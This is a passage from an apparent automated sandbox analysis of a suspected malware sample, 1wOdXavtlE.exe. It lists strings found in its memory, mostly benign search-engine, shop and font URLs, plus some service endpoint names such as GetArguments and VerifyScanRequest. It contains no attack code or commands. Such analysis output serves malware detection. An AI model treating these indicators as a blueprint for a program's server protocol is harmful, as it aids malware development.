Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/0
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArguments
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsResponse
Source: 1wOdXavtlE.exe, 00000002.00000002.485447672.0000000002CF5000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRe
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequest
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestResponse
Source: 1wOdXavtlE.exe, 00000002.00000002.486054377.0000000002DFF000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.coma9
Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comicta
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
